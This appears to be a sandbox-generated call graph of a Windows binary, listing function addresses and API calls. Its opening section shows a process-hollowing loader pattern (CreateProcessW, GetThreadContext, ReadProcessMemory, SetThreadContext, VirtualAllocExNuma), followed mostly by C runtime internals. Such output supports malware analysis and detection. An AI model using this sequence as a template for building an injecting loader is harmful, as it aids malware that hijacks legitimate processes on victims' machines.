19270 9509d0 19269->19270 19271 9509ec CreateFileW 19269->19271 19271->19270 19272 950a16 VirtualAlloc ReadFile 19271->19272 19272->19270 19275 950a43 19272->19275 19273 950a5c 19275->19273 19276 950d79 ExitProcess 19275->19276 19291 95020a 19275->19291 19277->19267 19306 95005f GetPEB 19278->19306 19280 95084c 19307 95005f GetPEB 19280->19307 19282 95085f 19308 95005f GetPEB 19282->19308 19284 950872 19309 9507da 19284->19309 19286 950880 19287 95089c VirtualAllocExNuma 19286->19287 19288 9508a9 19287->19288 19314 95073a 19288->19314 19321 95005f GetPEB 19291->19321 19293 950218 19294 9503b3 19293->19294 19295 9503c1 CreateProcessW 19293->19295 19299 9503eb 19293->19299 19300 9512e2 11 API calls 19293->19300 19303 950675 SetThreadContext 19293->19303 19305 951133 11 API calls 19293->19305 19322 9511c8 19293->19322 19331 950f81 19293->19331 19340 951082 19293->19340 19294->19275 19296 9503f0 GetThreadContext 19295->19296 19295->19299 19297 950410 ReadProcessMemory 19296->19297 19296->19299 19297->19293 19297->19299 19299->19294 19349 951133 19299->19349 19300->19293 19303->19293 19303->19299 19305->19293 19306->19280 19307->19282 19308->19284 19319 95005f GetPEB 19309->19319 19311 9507ea 19312 9507f0 GetSystemInfo 19311->19312 19313 95081b 19312->19313 19313->19286 19320 95005f GetPEB 19314->19320 19316 950746 19317 950766 VirtualAlloc 19316->19317 19318 950783 19317->19318 19318->19269 19319->19311 19320->19316 19321->19293 19323 9511e3 19322->19323 19358 95013e GetPEB 19323->19358 19325 951204 19326 9512bc 19325->19326 19327 95120c 19325->19327 19375 95160e 19326->19375 19360 950d82 19327->19360 19330 9512a3 19330->19293 19332 950f9c 19331->19332 19333 95013e GetPEB 19332->19333 19334 950fbd 19333->19334 19335 950fc5 19334->19335 19336 95104f 19334->19336 19337 950d82 10 API calls 19335->19337 19385 951632 19336->19385 19339 951036 19337->19339 19339->19293 19341 95109d 19340->19341 19342 95013e GetPEB 19341->19342 19343 9510be 19342->19343 19344 9510c2 19343->19344 19345 951108 19343->19345 19347 950d82 10 API calls 19344->19347 19388 951644 19345->19388 19348 9510fd 19347->19348 19348->19293 19350 951146 19349->19350 19351 95013e GetPEB 19350->19351 19352 951167 19351->19352 19353 9511b1 19352->19353 19354 95116b 19352->19354 19391 9515fc 19353->19391 19355 950d82 10 API calls 19354->19355 19357 9511a6 19355->19357 19357->19294 19359 950160 19358->19359 19359->19325 19378 95005f GetPEB 19360->19378 19362 950dcb 19379 950109 GetPEB 19362->19379 19365 950e58 19366 950e69 VirtualAlloc 19365->19366 19369 950f2d 19365->19369 19367 950e7f ReadFile 19366->19367 19366->19369 19368 950e94 VirtualAlloc 19367->19368 19367->19369 19368->19369 19372 950eb5 19368->19372 19370 950f76 19369->19370 19371 950f6b VirtualFree 19369->19371 19370->19330 19371->19370 19372->19369 19373 950f20 VirtualFree 19372->19373 19374 950f1c FindCloseChangeNotification 19372->19374 19373->19369 19374->19373 19376 950d82 10 API calls 19375->19376 19377 951618 19376->19377 19377->19330 19378->19362 19380 95011c 19379->19380 19382 950131 CreateFileW 19380->19382 19383 95017b GetPEB 19380->19383 19382->19365 19382->19369 19384 95019f 19383->19384 19384->19380 19386 950d82 10 API calls 19385->19386 19387 95163c 19386->19387 19387->19339 19389 950d82 10 API calls 19388->19389 19390 95164e 19389->19390 19390->19348 19392 950d82 10 API calls 19391->19392 19393 951606 19392->19393 19393->19357 20934 1356919 20937 1357195 20934->20937 20938 13571a1 ___unDNameEx 20937->20938 20943 1363682 EnterCriticalSection 20938->20943 20940 13571ab __strnicoll 20944 13571dd 20940->20944 20943->20940 20947 1363699 LeaveCriticalSection 20944->20947 20946 135693d 20947->20946 21078 1364902 21081 1364b21 21078->21081 21082 1364b2d ___unDNameEx 21081->21082 21089 1363682 EnterCriticalSection 21082->21089 21084 1364b37 21090 136487f 21084->21090 21089->21084 21091 1358bd5 __fread_nolock 41 API calls 21090->21091 21092 13648a1 21091->21092 21093 1358bd5 __fread_nolock 41 API calls 21092->21093 21094 13648c0 21093->21094 21095 13648e7 21094->21095 21096 1364b6e ___free_lconv_mon 14 API calls 21094->21096 21097 1364b62 21095->21097 21096->21095 21100 1363699 LeaveCriticalSection 21097->21100 21099 1364926 21100->21099 24547 1363a0b 24548 1363a16 24547->24548 24549 1363a26 24547->24549 24553 1363b90 24548->24553 24552 1364b6e ___free_lconv_mon 14 API calls 24552->24549 24554 1363ba5 24553->24554 24555 1363bab 24553->24555 24556 1364b6e ___free_lconv_mon 14 API calls 24554->24556 24557 1364b6e ___free_lconv_mon 14 API calls 24555->24557 24556->24555 24558 1363bb7 24557->24558 24559 1364b6e ___free_lconv_mon 14 API calls 24558->24559 24560 1363bc2 24559->24560 24561 1364b6e ___free_lconv_mon 14 API calls 24560->24561 24562 1363bcd 24561->24562 24563 1364b6e ___free_lconv_mon 14 API calls 24562->24563 24564 1363bd8 24563->24564 24565 1364b6e ___free_lconv_mon 14 API calls 24564->24565 24566 1363be3 24565->24566 24567 1364b6e ___free_lconv_mon 14 API calls 24566->24567 24568 1363bee 24567->24568 24569 1364b6e ___free_lconv_mon 14 API calls 24568->24569 24570 1363bf9 24569->24570 24571 1364b6e ___free_lconv_mon 14 API calls 24570->24571 24572 1363c04 24571->24572 24573 1364b6e ___free_lconv_mon 14 API calls 24572->24573 24574 1363c12 24573->24574 24579 1363ed4 24574->24579 24580 1363ee0 ___unDNameEx 24579->24580 24595 1363682 EnterCriticalSection 24580->24595 24582 1363f14 24596 1363f33 24582->24596 24584 1363eea 24584->24582 24586 1364b6e ___free_lconv_mon 14 API calls 24584->24586 24586->24582 24587 1363f3f 24588 1363f4b ___unDNameEx 24587->24588 24600 1363682 EnterCriticalSection 24588->24600 24590 1363f55 24601 1363a2c 24590->24601 24592 1363f68 24605 1363f88 24592->24605 24595->24584 24599 1363699 LeaveCriticalSection 24596->24599 24598 1363c38 24598->24587 24599->24598 24600->24590 24602 1363a62 __strnicoll 24601->24602 24603 1363a3b __strnicoll 24601->24603 24602->24592 24603->24602 24604 1368c0a __strnicoll 14 API calls 24603->24604 24604->24602 24608 1363699 LeaveCriticalSection 24605->24608 24607 1363a1e 24607->24552 24608->24607 20642 135a80b 20643 135a81e __vswprintf_c_l 20642->20643 20648 135af28 20643->20648 20646 135a44b __vswprintf_c_l 41 API calls 20647 135a836 20646->20647 20649 135af34 ___unDNameEx 20648->20649 20650 135af5c 20649->20650 20651 135af3b 20649->20651 20659 1365c5d EnterCriticalSection 20650->20659 20652 1364e5b _fwprintf_s 29 API calls 20651->20652 20655 135a82a 20652->20655 20654 135af67 20660 135aef6 20654->20660 20655->20646 20659->20654 20666 135ad55 20660->20666 20662 135af08 20663 135af9e 20662->20663 20680 1365c71 LeaveCriticalSection 20663->20680 20665 135afa6 20665->20655 20667 135ad64 20666->20667 20668 135ad8c 20666->20668 20669 1364e5b _fwprintf_s 29 API calls 20667->20669 20670 1380f73 __fread_nolock 41 API calls 20668->20670 20679 135ad7f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20669->20679 20671 135ad95 20670->20671 20672 1381ea5 45 API calls 20671->20672 20673 135adb3 20672->20673 20674 135ae3f 20673->20674 20676 135ae56 20673->20676 20673->20679 20675 135a9eb 46 API calls 20674->20675 20677 135ae4e 20675->20677 20678 135ab96 45 API calls 20676->20678 20676->20679 20677->20679 20678->20679 20679->20662 20680->20665 21128 1364709 21131 1363699 LeaveCriticalSection 21128->21131 21130 1364710 21131->21130 21551 1365978 21554 1365a4a 21551->21554 21555 1365a56 ___unDNameEx 21554->21555 21562 1365c5d EnterCriticalSection 21555->21562 21557 1365a60 ___scrt_uninitialize_crt 21558 1365a99 21557->21558 21563 13656fd 21557->21563 21576 1365aca 21558->21576 21562->21557 21564 1365712 __vswprintf_c_l 21563->21564 21565 1365724 21564->21565 21566 1365719 21564->21566 21567 1365762 _fwprintf_s 66 API calls 21565->21567 21579 136584e 21566->21579 21569 136572e 21567->21569 21571 1380f73 __fread_nolock 41 API calls 21569->21571 21575 136571f 21569->21575 21570 135a44b __vswprintf_c_l 41 API calls 21572 136575c 21570->21572 21573 1365745 21571->21573 21572->21558 21582 13844da 21573->21582 21575->21570 21624 1365c71 LeaveCriticalSection 21576->21624 21578 136599c 21593 1365ad6 21579->21593 21583 13844f8 21582->21583 21584 13844eb 21582->21584 21586 1384541 21583->21586 21588 138451f 21583->21588 21585 13676c8 __dosmaperr 14 API calls 21584->21585 21591 13844f0 21585->21591 21587 13676c8 __dosmaperr 14 API calls 21586->21587 21589 1384546 21587->21589 21606 13845e4 21588->21606 21590 1364c41 __strnicoll 41 API calls 21589->21590 21590->21591 21591->21575 21594 1365ae2 ___unDNameEx 21593->21594 21601 1363682 EnterCriticalSection 21594->21601 21596 1365b58 21602 1365b76 21596->21602 21597 1365aec ___scrt_uninitialize_crt 21597->21596 21600 1365a4a ___scrt_uninitialize_crt 70 API calls 21597->21600 21600->21597 21601->21597 21605 1363699 LeaveCriticalSection 21602->21605 21604 136588d 21604->21575 21605->21604 21607 13845f0 ___unDNameEx 21606->21607 21619 13702db EnterCriticalSection 21607->21619 21609 13845ff 21610 136fdd7 __fread_nolock 41 API calls 21609->21610 21618 1384644 21609->21618 21613 138462b FlushFileBuffers 21610->21613 21611 13676c8 __dosmaperr 14 API calls 21612 138464b 21611->21612 21620 138467a 21612->21620 21613->21612 21614 1384637 GetLastError 21613->21614 21616 1367721 __dosmaperr 14 API calls 21614->21616 21616->21618 21618->21611 21619->21609 21623 13702fe LeaveCriticalSection 21620->21623 21622 1384663 21622->21591 21623->21622 21624->21578 21658 136356e 21661 1363594 21658->21661 21662 13635a0 ___unDNameEx 21661->21662 21668 1363682 EnterCriticalSection 21662->21668 21664 13635ae __dosmaperr 21665 13635bf EnumSystemLocalesW 21664->21665 21669 1363604 21665->21669 21668->21664 21672 1363699 LeaveCriticalSection 21669->21672 21671 1363592 21672->21671 21691 1353357 21694 135336c 21691->21694 21695 1353382 21694->21695 21696 135337b 21694->21696 21703 1357a1b 21695->21703 21700 1357a8c 21696->21700 21699 1353362 21701 1357a1b 44 API calls 21700->21701 21702 1357a9e 21701->21702 21702->21699 21706 1357d25 21703->21706 21707 1357d31 ___unDNameEx 21706->21707 21714 1363682 EnterCriticalSection 21707->21714 21709 1357d3f 21715 1357ab8 21709->21715 21711 1357d4c 21725 1357d74 21711->21725 21714->21709 21716 1357ad3 21715->21716 21717 1357b46 __dosmaperr 21715->21717 21716->21717 21718 1357b26 21716->21718 21719 136f03e 44 API calls 21716->21719 21717->21711 21718->21717 21720 136f03e 44 API calls 21718->21720 21721 1357b1c 21719->21721 21722 1357b3c 21720->21722 21723 1364b6e ___free_lconv_mon 14 API calls 21721->21723 21724 1364b6e ___free_lconv_mon 14 API calls 21722->21724 21723->21718 21724->21717 21728 1363699 LeaveCriticalSection 21725->21728 21727 1357a4c 21727->21699 21728->21727 21732 1356b51 21735 135723b 21732->21735 21736 1357247 ___unDNameEx 21735->21736 21743 1363682 EnterCriticalSection 21736->21743 21738 1357251 21744 1356a53 21738->21744 21740 135725e 21756 135727c 21740->21756 21743->21738 21745 1356a69 21744->21745 21759 135654c 21745->21759 21747 1356a7c 21748 1356b3b __strnicoll 21747->21748 21750 1356a8c 21747->21750 21782 1368c0a 21748->21782 21749 1368e56 __strnicoll 14 API calls 21753 1356ae6 __strnicoll 21749->21753 21750->21749 21752 1356b4d 21752->21740 21753->21752 21754 1368e56 __strnicoll 14 API calls 21753->21754 21755 1356b16 21754->21755 21755->21740 22406 1363699 LeaveCriticalSection 21756->22406 21758 1356b75 21760 1356577 21759->21760 21764 1356598 21759->21764 21810 1356007 21760->21810 21763 135672c 21823 1355a40 21763->21823 21764->21763 21769 135671d 21764->21769 21773 13565da ___vcrt_InitializeCriticalSectionEx 21764->21773 21766 135674e 21766->21769 21770 1356583 21766->21770 21771 1356007 60 API calls 21766->21771 21767 1353e0d _ValidateLocalCookies 5 API calls 21768 1356828 21767->21768 21768->21747 21769->21770 21879 13563b1 21769->21879 21770->21767 21771->21766 21773->21769 21773->21770 21774 135682f 21773->21774 21776 135682a 21773->21776 21779 1356007 60 API calls 21773->21779 21814 1367af6 21773->21814 21775 1364c6e __wsopen_s 11 API calls 21774->21775 21778 135683b 21775->21778 21891 1353fff 21776->21891 21894 1357127 21778->21894 21779->21773 21783 1368c8a 21782->21783 21786 1368c20 21782->21786 21784 1368cd8 21783->21784 21787 1364b6e ___free_lconv_mon 14 API calls 21783->21787 22360 1368da4 21784->22360 21786->21783 21788 1368c53 21786->21788 21793 1364b6e ___free_lconv_mon 14 API calls 21786->21793 21789 1368cac 21787->21789 21790 1368c75 21788->21790 21799 1364b6e ___free_lconv_mon 14 API calls 21788->21799 21791 1364b6e ___free_lconv_mon 14 API calls 21789->21791 21792 1364b6e ___free_lconv_mon 14 API calls 21790->21792 21794 1368cbf 21791->21794 21795 1368c7f 21792->21795 21797 1368c48 21793->21797 21800 1364b6e ___free_lconv_mon 14 API calls 21794->21800 21803 1364b6e ___free_lconv_mon 14 API calls 21795->21803 21796 1368d46 21804 1364b6e ___free_lconv_mon 14 API calls 21796->21804 22320 1366e4a 21797->22320 21798 1368ce6 21798->21796 21806 1364b6e 14 API calls ___free_lconv_mon 21798->21806 21801 1368c6a 21799->21801 21802 1368ccd 21800->21802 22348 1367190 21801->22348 21808 1364b6e ___free_lconv_mon 14 API calls 21802->21808 21803->21783 21809 1368d4c 21804->21809 21806->21798 21808->21784 21809->21752 21811 136373a _unexpected 41 API calls 21810->21811 21812 1356033 21811->21812 21813 1355a40 60 API calls 21812->21813 21817 1367b01 21814->21817 21815 1367b1b 21816 13676c8 __dosmaperr 14 API calls 21815->21816 21818 1367b2f 21815->21818 21822 1367b25 21816->21822 21817->21815 21817->21818 21820 1367b59 21817->21820 21818->21773 21819 1364c41 __strnicoll 41 API calls 21819->21818 21820->21818 21821 13676c8 __dosmaperr 14 API calls 21820->21821 21821->21822 21822->21819 21824 1355aa5 21823->21824 21825 1355a7a 21823->21825 21826 1353e0d _ValidateLocalCookies 5 API calls 21824->21826 21827 1355ab2 21825->21827 21829 1355a8c 21825->21829 21828 1355df7 21826->21828 21830 136373a _unexpected 41 API calls 21827->21830 21828->21766 21831 1367936 41 API calls 21829->21831 21832 1355ab7 21830->21832 21833 1355a9a 21831->21833 21902 1357022 21832->21902 21833->21824 21835 1355da4 21833->21835 21836 1364c6e __wsopen_s 11 API calls 21835->21836 21839 1355e05 21836->21839 21838 1355e37 21838->21766 21839->21838 21845 1355e3c 21839->21845 22037 13678b3 21839->22037 21841 1355d9d 21841->21835 21844 1367936 41 API calls 21841->21844 21842 1355c16 21997 1362a1a 21842->21997 21843 1355b83 21843->21842 21848 1355bb7 21843->21848 21849 1355bb0 21843->21849 21850 1355dd0 21844->21850 21847 1364c6e __wsopen_s 11 API calls 21845->21847 21851 1355e46 21847->21851 21950 1368eb1 21848->21950 21911 13697ee 21849->21911 21850->21835 21854 1355dd7 21850->21854 22030 135706c 21854->22030 21857 1355bb5 21857->21842 21861 1355bc3 21857->21861 21858 1355c57 22006 1356e1d 21858->22006 21859 1355c27 22003 1356ff3 21859->22003 21992 1355e47 21861->21992 21868 1367af6 41 API calls 21878 1355c45 21868->21878 21869 1362a1a 6 API calls 21871 1355c79 21869->21871 21871->21854 21873 1356ff3 6 API calls 21871->21873 21877 1355c91 21871->21877 21873->21877 21875 1367af6 41 API calls 21875->21841 21876 1367af6 41 API calls 21876->21878 21877->21854 21877->21876 21878->21835 22021 135709c 21878->22021 21880 1367865 __fread_nolock 15 API calls 21879->21880 21881 13563cb 21880->21881 21887 13564dc 21881->21887 22303 1355e06 21881->22303 21883 13678b3 41 API calls 21884 1356404 21883->21884 21884->21883 21885 1355e06 41 API calls 21884->21885 21888 13564a5 21884->21888 21885->21884 21886 13564c5 21886->21887 21890 1364b6e ___free_lconv_mon 14 API calls 21886->21890 21887->21770 21888->21886 21889 1364b6e ___free_lconv_mon 14 API calls 21888->21889 21889->21886 21890->21887 22310 1353e1b IsProcessorFeaturePresent 21891->22310 21895 1357133 ___unDNameEx 21894->21895 22315 1363682 EnterCriticalSection 21895->22315 21897 135713d 21898 135716b 21897->21898 21901 1368e56 __strnicoll 14 API calls 21897->21901 22316 1357189 21898->22316 21901->21897 21903 1367af6 41 API calls 21902->21903 21904 1357051 21903->21904 21905 1355ae8 21904->21905 21906 1364c6e __wsopen_s 11 API calls 21904->21906 21905->21841 21908 1362dbd 21905->21908 21907 135706b 21906->21907 21909 136317b __strnicoll 5 API calls 21908->21909 21910 1362dc2 21909->21910 21910->21843 21912 136373a _unexpected 41 API calls 21911->21912 21913 1369814 21912->21913 21914 136373a _unexpected 41 API calls 21913->21914 21915 1369827 21914->21915 21919 136985d 21915->21919 22046 13699e3 21915->22046 21916 13698dc 21918 13698f3 GetUserDefaultLCID 21916->21918 21922 13698e7 21916->21922 21928 13698ce 21918->21928 21919->21916 21921 1369873 21919->21921 21920 1369889 22055 1369d32 21920->22055 21921->21920 21925 136987e 21921->21925 22060 1369e66 21922->22060 22050 1369a44 21925->22050 21926 1369887 21926->21928 21930 13699e3 42 API calls 21926->21930 21949 136990e 21928->21949 22065 1369f76 21928->22065 21933 13698b1 21930->21933 21931 1353e0d _ValidateLocalCookies 5 API calls 21934 136991d 21931->21934 21933->21928 21937 13698d0 21933->21937 21939 13698c5 21933->21939 21934->21857 21935 136993f IsValidCodePage 21936 136994d IsValidLocale 21935->21936 21935->21949 21938 136995c 21936->21938 21936->21949 21940 1369d32 42 API calls 21937->21940 22075 1362aaf 21938->22075 21942 1369a44 42 API calls 21939->21942 21940->21928 21942->21928 21944 1362aaf 41 API calls 21945 136998f GetLocaleInfoW 21944->21945 21946 13699a8 GetLocaleInfoW 21945->21946 21945->21949 21947 13699c7 21946->21947 21946->21949 22080 137033d 21947->22080 21949->21931 21951 136373a _unexpected 41 API calls 21950->21951 21952 1368ec3 21951->21952 21953 1368efd 21952->21953 22179 13690ac 21952->22179 21955 1368f51 21953->21955 21956 1368f0a 21953->21956 22191 13695aa 21955->22191 21957 1368f11 21956->21957 21958 1368f18 21956->21958 22183 1369119 21957->22183 22187 1369492 21958->22187 21962 1368f16 21963 13690ac 42 API calls 21962->21963 21975 1368f48 21962->21975 21967 1368f32 21963->21967 21964 1369083 21964->21857 21965 1368f7a 22202 1369631 21965->22202 21966 1368f72 GetACP 21969 1368f81 21966->21969 21970 1368f43 21967->21970 21971 1368f4a 21967->21971 21967->21975 21969->21964 21973 1368f99 IsValidCodePage 21969->21973 21972 1369119 8 API calls 21970->21972 21974 1369492 8 API calls 21971->21974 21972->21975 21973->21964 21976 1368fab 21973->21976 21974->21975 21975->21964 21975->21965 21975->21966 21976->21964 21976->21976 21977 1367af6 41 API calls 21976->21977 21978 1368fef 21977->21978 21979 136907c 21978->21979 22213 1362890 21978->22213 21979->21964 21981 1364c6e __wsopen_s 11 API calls 21979->21981 21983 13690ab 21981->21983 21984 1362890 6 API calls 21985 136902a 21984->21985 21985->21964 21986 1362890 6 API calls 21985->21986 21987 136905b 21985->21987 21986->21987 21987->21964 21988 1369085 21987->21988 21989 136906d 21987->21989 21991 137033d 41 API calls 21988->21991 21990 1367af6 41 API calls 21989->21990 21990->21979 21991->21964 21993 1367936 41 API calls 21992->21993 21994 1355e5d 21993->21994 21995 1364c6e __wsopen_s 11 API calls 21994->21995 21996 1355eb6 21995->21996 22239 13632e7 21997->22239 22000 1362aee __strnicoll 5 API calls 22001 1362a46 IsValidLocale 22000->22001 22002 1355c22 22001->22002 22002->21858 22002->21859 22004 1362890 6 API calls 22003->22004 22005 1355c2c 22004->22005 22005->21868 22007 1356e4c __fread_nolock 22006->22007 22010 1356fd4 22007->22010 22012 1356ed2 22007->22012 22020 1356fc8 22007->22020 22008 1353e0d _ValidateLocalCookies 5 API calls 22009 1355c63 22008->22009 22009->21854 22009->21869 22011 1356c3e 41 API calls 22010->22011 22011->22020 22012->22020 22242 1356c3e 22012->22242 22020->22008 22022 1367af6 41 API calls 22021->22022 22023 13570ba 22022->22023 22024 13570c1 22023->22024 22025 13570d3 22023->22025 22295 13570e0 22024->22295 22027 1364c6e __wsopen_s 11 API calls 22025->22027 22029 13570df 22027->22029 22028 1355c10 22028->21841 22028->21875 22031 1357072 22030->22031 22032 135708e 22030->22032 22033 1367af6 41 API calls 22031->22033 22032->21824 22034 1357087 22033->22034 22034->22032 22035 1364c6e __wsopen_s 11 API calls 22034->22035 22036 135709b 22035->22036 22041 13678be 22037->22041 22038 13678da 22039 13676c8 __dosmaperr 14 API calls 22038->22039 22045 13678e4 22039->22045 22040 1364c41 __strnicoll 41 API calls 22042 13678ee 22040->22042 22041->22038 22043 136790a 22041->22043 22042->21839 22043->22042 22044 13676c8 __dosmaperr 14 API calls 22043->22044 22044->22045 22045->22040 22047 1369a29 22046->22047 22049 13699f5 22046->22049 22047->21919 22049->22047 22084 138661c 22049->22084 22051 136373a _unexpected 41 API calls 22050->22051 22054 1369a51 22051->22054 22052 1369aac EnumSystemLocalesW 22053 1369ad8 22052->22053 22053->21926 22054->22052 22056 136373a _unexpected 41 API calls 22055->22056 22057 1369d3f 22056->22057 22058 1369d72 EnumSystemLocalesW 22057->22058 22059 1369d8a 22058->22059 22059->21926 22061 136373a _unexpected 41 API calls 22060->22061 22062 1369e72 22061->22062 22062->22062 22063 1369e87 EnumSystemLocalesW 22062->22063 22064 1369eab 22063->22064 22064->21928 22066 136a027 GetLocaleInfoW 22065->22066 22067 1369f89 22065->22067 22068 136a046 22066->22068 22069 1369937 22066->22069 22067->22066 22071 1369fca 22067->22071 22068->22069 22070 136a04d GetACP 22068->22070 22069->21935 22069->21949 22070->22069 22072 136a01e 22071->22072 22073 1369ffe GetLocaleInfoW 22071->22073 22109 1382815 22072->22109 22073->22069 22147 136331b 22075->22147 22079 1362ac0 22079->21944 22079->21949 22081 1370349 22080->22081 22157 1370853 22081->22157 22085 138662a 22084->22085 22086 138664d 22084->22086 22085->22086 22088 1386630 22085->22088 22094 1386665 22086->22094 22090 13676c8 __dosmaperr 14 API calls 22088->22090 22089 1386660 22089->22049 22091 1386635 22090->22091 22092 1364c41 __strnicoll 41 API calls 22091->22092 22093 1386640 22092->22093 22093->22049 22095 138668f 22094->22095 22096 1386675 22094->22096 22098 13866ae 22095->22098 22099 1386697 22095->22099 22097 13676c8 __dosmaperr 14 API calls 22096->22097 22100 138667a 22097->22100 22102 13642b8 __strnicoll 41 API calls 22098->22102 22101 13676c8 __dosmaperr 14 API calls 22099->22101 22103 1364c41 __strnicoll 41 API calls 22100->22103 22104 138669c 22101->22104 22108 13866b9 22102->22108 22107 1386685 22103->22107 22105 1364c41 __strnicoll 41 API calls 22104->22105 22105->22107 22106 1386785 42 API calls 22106->22108 22107->22089 22108->22106 22108->22107 22110 1382828 __vswprintf_c_l 22109->22110 22115 13830a7 22110->22115 22112 1382842 22113 135a44b __vswprintf_c_l 41 API calls 22112->22113 22114 138284f 22113->22114 22114->22069 22129 137e1bf 22115->22129 22117 1383105 22118 1383129 22117->22118 22122 1371420 UnDecorator::getSymbolName 41 API calls 22117->22122 22125 1383145 22118->22125 22136 1389c09 22118->22136 22119 13830bd 22119->22117 22120 13830d2 22119->22120 22128 13830ed UnDecorator::getSymbolName 22119->22128 22121 1364e5b _fwprintf_s 29 API calls 22120->22121 22121->22128 22122->22118 22124 1383435 22126 137e1e5 swprintf 41 API calls 22124->22126 22125->22124 22140 137e1e5 22125->22140 22126->22128 22128->22112 22130 137e1d7 22129->22130 22131 137e1c4 22129->22131 22130->22119 22132 13676c8 __dosmaperr 14 API calls 22131->22132 22133 137e1c9 22132->22133 22134 1364c41 __strnicoll 41 API calls 22133->22134 22135 137e1d4 22134->22135 22135->22119 22137 1389c30 22136->22137 22138 1389c26 22136->22138 22137->22118 22138->22137 22146 138fb4b GetStringTypeW 22138->22146 22141 137e20f 22140->22141 22142 137e1fa 22140->22142 22141->22124 22142->22141 22143 13676c8 __dosmaperr 14 API calls 22142->22143 22144 137e204 22143->22144 22145 1364c41 __strnicoll 41 API calls 22144->22145 22145->22141 22146->22137 22148 13630d1 __dosmaperr 5 API calls 22147->22148 22149 1362aba 22148->22149 22149->22079 22150 138409f 22149->22150 22151 13840ae _vsnprintf 22150->22151 22152 13840f9 22150->22152 22151->22152 22153 1367936 41 API calls 22151->22153 22152->22079 22154 1384129 22153->22154 22154->22152 22155 1364c6e __wsopen_s 11 API calls 22154->22155 22156 1384141 22155->22156 22158 1370873 22157->22158 22159 1370860 22157->22159 22161 137089f 22158->22161 22163 1370894 22158->22163 22164 137088b 22158->22164 22160 13676c8 __dosmaperr 14 API calls 22159->22160 22162 1370865 22160->22162 22165 13676c8 __dosmaperr 14 API calls 22161->22165 22166 1364c41 __strnicoll 41 API calls 22162->22166 22163->22161 22168 13708b2 22163->22168 22167 13676c8 __dosmaperr 14 API calls 22164->22167 22171 1370890 22165->22171 22170 137036b 22166->22170 22167->22171 22173 13708c5 22168->22173 22170->21949 22172 1364c41 __strnicoll 41 API calls 22171->22172 22172->22170 22174 13708e2 22173->22174 22175 13676c8 __dosmaperr 14 API calls 22174->22175 22177 1370952 22174->22177 22176 1370948 22175->22176 22178 1364c41 __strnicoll 41 API calls 22176->22178 22177->22170 22178->22177 22180 136910d 22179->22180 22182 13690c0 22179->22182 22180->21953 22181 138661c 42 API calls 22181->22182 22182->22180 22182->22181 22184 1369132 22183->22184 22184->22184 22219 13626b2 22184->22219 22188 13694a7 22187->22188 22189 13626b2 8 API calls 22188->22189 22190 13694dd 22189->22190 22190->21962 22227 1362953 22191->22227 22194 1353e0d _ValidateLocalCookies 5 API calls 22195 1369624 22194->22195 22195->21975 22196 1367af6 41 API calls 22197 1369611 22196->22197 22198 1369626 22197->22198 22199 1369618 22197->22199 22200 1364c6e __wsopen_s 11 API calls 22198->22200 22199->22194 22201 1369630 22200->22201 22203 13696df 22202->22203 22205 1369644 22202->22205 22204 1362890 6 API calls 22203->22204 22212 13696f8 22204->22212 22205->22203 22206 138661c 42 API calls 22205->22206 22207 1369694 22206->22207 22208 138661c 42 API calls 22207->22208 22207->22212 22209 13696a5 22208->22209 22209->22203 22210 136970d 22209->22210 22209->22212 22211 1382815 42 API calls 22210->22211 22211->22212 22212->21969 22236 1363217 22213->22236 22216 1362aee __strnicoll 5 API calls 22218 13628c3 GetLocaleInfoW 22216->22218 22217 13628aa 22217->21964 22217->21984 22218->22217 22224 1363195 22219->22224 22222 1363594 3 API calls 22223 13626c6 22222->22223 22223->21962 22225 13630d1 __dosmaperr 5 API calls 22224->22225 22226 13626c0 22225->22226 22226->22222 22226->22223 22233 136327f 22227->22233 22230 1362976 GetUserDefaultLCID 22231 1362aaf 41 API calls 22230->22231 22232 1362964 22231->22232 22232->22196 22232->22199 22234 13630d1 __dosmaperr 5 API calls 22233->22234 22235 136295e 22234->22235 22235->22230 22235->22232 22237 13630d1 __dosmaperr 5 API calls 22236->22237 22238 136289b 22237->22238 22238->22216 22238->22217 22240 13630d1 __dosmaperr 5 API calls 22239->22240 22241 1362a25 22240->22241 22241->22000 22241->22002 22243 1356c4f 22242->22243 22244 1356c9b 22242->22244 22243->22244 22277 1356bc3 22243->22277 22244->22020 22253 1356cb0 22244->22253 22247 1367af6 41 API calls 22248 1356c79 22247->22248 22249 1356c93 22248->22249 22250 1367af6 41 API calls 22248->22250 22249->22244 22251 1364c6e __wsopen_s 11 API calls 22249->22251 22250->22249 22252 1356caf 22251->22252 22254 1356cc1 22253->22254 22255 1356d0f 22253->22255 22254->22255 22256 1356bc3 41 API calls 22254->22256 22255->22020 22262 1356d20 22255->22262 22257 1356cd0 22256->22257 22257->22255 22286 13679fe 22257->22286 22260 1364c6e __wsopen_s 11 API calls 22261 1356d1f 22260->22261 22263 1356dcc 22262->22263 22265 1356d37 _vsnprintf 22262->22265 22263->22020 22271 1356dde 22263->22271 22264 136769e UnDecorator::getSymbolName 41 API calls 22264->22265 22265->22263 22265->22264 22266 1356d79 22265->22266 22267 1367af6 41 API calls 22266->22267 22268 1356d91 22267->22268 22268->22263 22269 1364c6e __wsopen_s 11 API calls 22268->22269 22270 1356ddd 22269->22270 22272 1356df0 22271->22272 22273 1367af6 41 API calls 22272->22273 22274 1356e05 22273->22274 22275 1364c6e __wsopen_s 11 API calls 22274->22275 22276 1356e1c 22275->22276 22278 1356bf7 22277->22278 22280 1356bd2 _vsnprintf 22277->22280 22278->22244 22278->22247 22280->22278 22281 136769e 22280->22281 22282 136373a _unexpected 41 API calls 22281->22282 22283 13676a9 22282->22283 22284 1384400 __strnicoll 41 API calls 22283->22284 22285 13676b9 22284->22285 22285->22280 22292 1367a09 22286->22292 22287 1367a21 22288 13676c8 __dosmaperr 14 API calls 22287->22288 22289 1356cef 22287->22289 22290 1367a4a 22288->22290 22289->22255 22289->22260 22291 1364c41 __strnicoll 41 API calls 22290->22291 22291->22289 22292->22287 22293 1367a79 22292->22293 22293->22289 22294 13676c8 __dosmaperr 14 API calls 22293->22294 22294->22290 22296 1367af6 41 API calls 22295->22296 22297 13570f8 22296->22297 22298 13570ff 22297->22298 22299 1364c6e __wsopen_s 11 API calls 22297->22299 22298->22028 22300 1357114 22299->22300 22301 1364b6e ___free_lconv_mon 14 API calls 22300->22301 22302 1357122 22301->22302 22302->22028 22305 1355e16 22303->22305 22308 1355e37 22303->22308 22304 13678b3 41 API calls 22304->22305 22305->22304 22306 1355e3c 22305->22306 22305->22308 22307 1364c6e __wsopen_s 11 API calls 22306->22307 22309 1355e46 22307->22309 22308->21884 22311 1353e30 22310->22311 22314 1354105 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 